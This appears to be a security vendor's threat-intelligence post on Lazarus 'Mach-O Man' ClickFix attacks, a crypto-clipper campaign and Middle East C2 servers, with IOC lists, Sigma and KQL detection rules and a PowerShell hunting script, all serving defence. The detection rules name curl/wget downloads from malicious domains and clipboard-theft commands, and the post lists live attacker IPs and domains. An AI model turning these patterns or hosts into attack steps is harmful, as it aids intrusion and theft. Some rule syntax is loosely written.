These OTX pulses reveal a coordinated multi-front threat landscape targeting enterprise financial and energy sectors. The Lazarus Group is actively deploying "Mach-O Man" malware through sophisticated ClickFix attacks, while DataBreachPlus operates a multi-stage crypto clipper operation targeting both Windows and macOS platforms. Simultaneously, nation-state actors including APT28 and ENERGETIC BEAR have established extensive C2 infrastructure across the Middle East, with Saudi Arabia's STC hosting 72.4% of regional malicious servers. Collectively, these campaigns demonstrate an alarming trend toward credential theft, cryptocurrency hijacking, and establishment of persistent surveillance infrastructure, all while utilizing legitimate-looking delivery mechanisms such as fake FedEx communications and fraudulent meeting invitations.
Threat Actor / Malware Profile
DataBreachPlus (TwizAdmin & crpx0)
This Russian-speaking operation demonstrates advanced multi-platform capabilities targeting cryptocurrency assets. Distribution appears to leverage FedEx-themed phishing emails or messages. The malware employs a multi-stage architecture starting with clipboard hijacking across eight blockchain networks, escalating to BIP-39 seed phrase theft and browser credential exfiltration. The campaign culminates with ransomware deployment (crpx0) and establishes persistence through a Java RAT builder with a FastAPI-based C2 panel requiring license key authentication. The operation displays sophisticated operational security through domain rotation and file hash variation.
Lazarus Group (Mach-O Man & PyLangGhostRAT)
The DPRK-linked actor continues targeting finance and technology sectors through social engineering campaigns. Their latest innovation, "Mach-O Man," represents a purpose-built macOS malware kit distributed via Telegram-based ClickFix attacks impersonating legitimate collaboration platforms (Zoom, Teams, Google Meet). Attack chains begin with fraudulent meeting invitations leading to fake collaboration sites where victims are manipulated into executing terminal commands that download the malware. The malware focuses on credential theft from browsers, with data exfiltration via Telegram channels. PyLangGhostRAT provides remote access capabilities, likely enabling lateral movement within target environments.
Middle East Infrastructure Campaign
A collaborative infrastructure operation by nation-state actors including Eagle Werewolf, ENERGETIC BEAR, Velvet Tempest, APT28, and GrayCharlie has established 1,350+ C2 servers across Middle Eastern telecommunications and hosting providers. This infrastructure supports diverse malware families including Phorpiex, XMRig, LockBit Black, EchoGather, Sliver, SoullessRAT, and Cobalt Strike. The concentration of 72.4% of malicious infrastructure on Saudi Arabia's STC network suggests either compromise of legitimate hosting accounts or exploitation of infrastructure vulnerabilities (CVE-2025-11953). The strategic positioning across 14 countries enables regional threat actors to conduct surveillance, credential theft, and ransomware operations with minimal latency and reduced detection probability.
IOC Analysis
The pulse data presents a diverse set of indicators requiring different detection approaches:
Domain and URL Indicators (fanonlyatn.xyz, livemicrosft.com): These domains serve as distribution points for malware payloads and should be blocked at the DNS layer. SOC teams should deploy these to network appliances and endpoint DNS resolvers. Analyzing certificate transparency logs can reveal associated infrastructure.
File Hashes (23 unique SHA256 hashes): These represent executable payloads across multiple platforms (Windows and macOS). Endpoint detection solutions should be configured to immediately quarantine matching files. Hash analysis can reveal code signing certificates and compilation timestamps that may correlate with other campaigns.
IPv4 Addresses (6 indicators): These C2 servers demonstrate geographically dispersed infrastructure focusing on the Middle East. Network detection should implement blocking rules for these IPs, with special attention to outbound connections from privileged accounts or servers hosting sensitive data.
CVE Reference (CVE-2025-11953): While details aren't provided in the pulse, this likely represents the vulnerability exploited in the infrastructure compromise. Vulnerability scanners should be updated to check for this CVE across the enterprise.
Operationalization requires tiered implementation: network perimeter blocking (firewalls, proxies), endpoint protection integration (EDR signatures), and SIEM correlation rules (network connections to known bad IPs, execution of known malicious file hashes).
Detection Engineering
---
title: Potential Mach-O Man Malware Installation via Terminal
id: 9fe6a2c1-fd34-5678-9a1b-cdef12345678
description: Detects potential installation of Mach-O Man malware via terminal commands typically used in ClickFix attacks
status: experimental
author: Security Arsenal
date: 2026/05/27
references:
- https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
- attack.execution
- attack.t1059.004
- attack.initial_access
- attack.t1566.001
logsource:
product: macos
category: process_creation
detection:
selection:
Image|endswith: '/bin/bash'
CommandLine|contains:
- 'curl'
- 'wget'
CommandLine|contains:
- 'livemicrosft.com'
- 'fakezoom.com'
- 'falsesite.com'
condition: selection
falsepositives:
- Legitimate software installation
level: high
---
title: TwizAdmin C2 Network Communication
id: 8fe6a2c1-fd34-5678-9a1b-cdef12345679
description: Detects network connections to known TwizAdmin C2 infrastructure
status: experimental
author: Security Arsenal
date: 2026/05/27
references:
- https://intel.breakglass.tech/post/twizadmin-103-241-66
tags:
- attack.command_and_control
- attack.t1071.001
logsource:
product: windows
category: network_connection
detection:
selection:
DestinationHostname|contains:
- 'fanonlyatn.xyz'
- '103.241.66'
DestinationPort: 1337
condition: selection
falsepositives:
- Unknown
level: critical
---
title: Suspicious Clipboard Access Pattern
id: 7fe6a2c1-fd34-5678-9a1b-cdef1234567a
description: Detects suspicious clipboard access patterns consistent with crypto-clipping malware
status: experimental
author: Security Arsenal
date: 2026/05/27
references:
- https://intel.breakglass.tech/post/twizadmin-103-241-66
tags:
- attack.collection
- attack.t1115
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
CommandLine|contains:
- 'Get-Clipboard'
- 'clipboard.GetText'
- 'Set-Clipboard'
- 'clipboard.setText'
filter:
CommandLine|contains:
- 'type'
- 'get-content'
- 'cat'
condition: selection and not filter
falsepositives:
- Administrative scripts
- Legitimate clipboard management tools
level: medium
kql
// Hunt for suspicious network connections related to identified threat actors
let MaliciousIPs = datatable(IP:string) [
"37.32.15.8",
"197.51.170.131",
"5.109.182.231",
"93.113.62.247",
"94.252.245.193",
"103.241.66.238"
];
let MaliciousDomains = datatable(Domain:string) [
"fanonlyatn.xyz",
"livemicrosft.com"
];
DeviceNetworkEvents
| where RemoteIP in (MaliciousIPs) or RemoteUrl has_any (MaliciousDomains)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteIP, RemoteUrl, RemotePort
| order by Timestamp desc
powershell
# TwizAdmin & Mach-O Man IOC Hunter
# Version: 1.0
# Author: Security Arsenal
# Known Malicious Hashes
$maliciousHashes = @(
"06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
"3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
"584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527",
"74ab520e94b2f3b8915ec7b47abab7a2d7e9759add5aa195af7edf0ffa5b4150",
"9d9783f57fd543043e0792d125831883259c823a5eaa69211e5254db4db4eaec",
"0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
"24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9",
"4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b",
"85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c",
"871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3",
"89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938",
"a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614"
)
# Known Malicious Domains
$maliciousDomains = @(
"fanonlyatn.xyz",
"livemicrosft.com"
)
# Known Malicious IPs
$maliciousIPs = @(
"37.32.15.8",
"197.51.170.131",
"5.109.182.231",
"93.113.62.247",
"94.252.245.193",
"103.241.66.238"
)
# Function to calculate file hash
function Get-FileHashCustom {
param([string]$Path)
if (Test-Path $Path) {
$fileStream = [System.IO.File]::OpenRead($Path)
$hashAlgorithm = [System.Security.Cryptography.SHA256]::Create()
$hash = $hashAlgorithm.ComputeHash($fileStream)
$fileStream.Close()
$hashString = [System.BitConverter]::ToString($hash).Replace("-", "").ToLower()
return $hashString
}
return $null
}
# Function to check for suspicious network connections
function Test-SuspiciousConnections {
Write-Host "`n[+] Checking for suspicious network connections..."
$connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
Where-Object { $maliciousIPs -contains $_.RemoteAddress }
if ($connections) {
Write-Host "[!] ALERT: Found connections to malicious IPs:" -ForegroundColor Red
foreach ($conn in $connections) {
$process = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
Write-Host " Remote IP: $($conn.RemoteAddress) | Local Port: $($conn.LocalPort) | Process: $($process.ProcessName) (PID: $($conn.OwningProcess))" -ForegroundColor Yellow
}
} else {
Write-Host "[*] No suspicious network connections found." -ForegroundColor Green
}
}
# Function to scan common directories for malware
function Search-MaliciousFiles {
param([string[]]$Paths)
Write-Host "`n[+] Scanning directories for malicious files..."
$foundMalware = $false
foreach ($path in $Paths) {
if (Test-Path $path) {
Write-Host "[*] Scanning $path..."
$files = Get-ChildItem -Path $path -Recurse -File -ErrorAction SilentlyContinue |
Where-Object { $_.Length -gt 0 -and $_.Length -lt 50MB }
foreach ($file in $files) {
$hash = Get-FileHashCustom -Path $file.FullName
if ($hash -in $maliciousHashes) {
Write-Host "[!] ALERT: Found malicious file: $($file.FullName)" -ForegroundColor Red
Write-Host " Hash: $hash" -ForegroundColor Yellow
$foundMalware = $true
}
}
}
}
if (-not $foundMalware) {
Write-Host "[*] No malicious files found in common directories." -ForegroundColor Green
}
}
# Function to check browser data for suspicious access
function Test-BrowserAccess {
Write-Host "`n[+] Checking for suspicious browser data access..."
$browsers = @(
"chrome.exe",
"msedge.exe",
"firefox.exe",
"brave.exe"
)
$processes = Get-Process | Where-Object { $_.ProcessName -in $browsers }
if ($processes) {
Write-Host "[*] Browser processes running:"
foreach ($proc in $processes) {
Write-Host " - $($proc.ProcessName) (PID: $($proc.Id))" -ForegroundColor Cyan
}
# Check for processes accessing browser data directories
$browserDataPaths = @(
"$env:LOCALAPPDATA\Google\Chrome\User Data",
"$env:LOCALAPPDATA\Microsoft\Edge\User Data",
"$env:APPDATA\Mozilla\Firefox\Profiles"
)
foreach ($path in $browserDataPaths) {
if (Test-Path $path) {
$handles = Get-Process | ForEach-Object {
$proc = $_
try {
$processModules = $proc.Modules | Where-Object { $_.FileName -like "*$path*" }
if ($processModules) {
[PSCustomObject]@{
ProcessName = $proc.ProcessName
PID = $proc.Id
Path = $path
}
}
} catch {
# Ignore access errors
}
}
if ($handles) {
Write-Host "[!] Processes accessing browser data in $path:" -ForegroundColor Yellow
foreach ($handle in $handles) {
Write-Host " - $($handle.ProcessName) (PID: $($handle.PID))" -ForegroundColor Cyan
}
}
}
}
} else {
Write-Host "[*] No browsers currently running." -ForegroundColor Green
}
}
# Function to check DNS cache for malicious domains
function Test-DNSCache {
Write-Host "`n[+] Checking DNS cache for malicious domains..."
$dnsCache = Get-DnsClientCache -ErrorAction SilentlyContinue
if ($dnsCache) {
$badEntries = $dnsCache | Where-Object { $maliciousDomains -contains $_.Entry }
if ($badEntries) {
Write-Host "[!] ALERT: Found entries for malicious domains in DNS cache:" -ForegroundColor Red
foreach ($entry in $badEntries) {
Write-Host " - $($entry.Name) -> $($entry.Data)" -ForegroundColor Yellow
}
} else {
Write-Host "[*] No malicious domains found in DNS cache." -ForegroundColor Green
}
} else {
Write-Host "[*] Unable to retrieve DNS cache." -ForegroundColor Yellow
}
}
# Main execution
Write-Host "TwizAdmin & Mach-O Man IOC Hunter" -ForegroundColor Cyan
Write-Host "================================" -ForegroundColor Cyan
# Check for administrator privileges
if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
Write-Host "[!] WARNING: This script should be run as Administrator for complete functionality." -ForegroundColor Yellow
}
# Perform checks
Test-SuspiciousConnections
Search-MaliciousFiles -Paths @("$env:TEMP", "$env:APPDATA", "$env:LOCALAPPDATA", "$env:USERPROFILE\Downloads")
Test-BrowserAccess
Test-DNSCache
Write-Host "`n[*] Hunt complete. Review any alerts above and investigate suspicious findings." -ForegroundColor Cyan
Response Priorities
Immediate
- Block all identified IOCs (IPs, domains, URLs) at network perimeter (firewalls, proxies, DNS filtering)
- Deploy file hash signatures to all endpoint protection platforms
- Initiate hunt for matching file hashes across endpoints using EDR capabilities
- Isolate any systems with confirmed connections to C2 infrastructure
- Update web filtering to block access to identified malicious domains
24h
- Implement mandatory password resets for all privileged accounts due to credential theft capabilities of identified malware
- Enable multi-factor authentication across all sensitive applications
- Conduct memory forensics on potentially compromised endpoints to detect credential dumping tools
- Review browser saved credentials across enterprise systems for potential compromise
- Validate integrity of cryptocurrency wallets and blockchain-related applications
1 week
- Implement application allowlisting to prevent execution of unsigned binaries
- Deploy advanced email filtering for FedEx-themed and meeting invitation phishing campaigns
- Conduct targeted security awareness training focused on social engineering and ClickFix attacks
- Review and restrict PowerShell execution policies across the enterprise
- Implement network segmentation to limit lateral movement capabilities
- Deploy deception technology (honeypots, honeytokens) to detect credential theft attempts
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.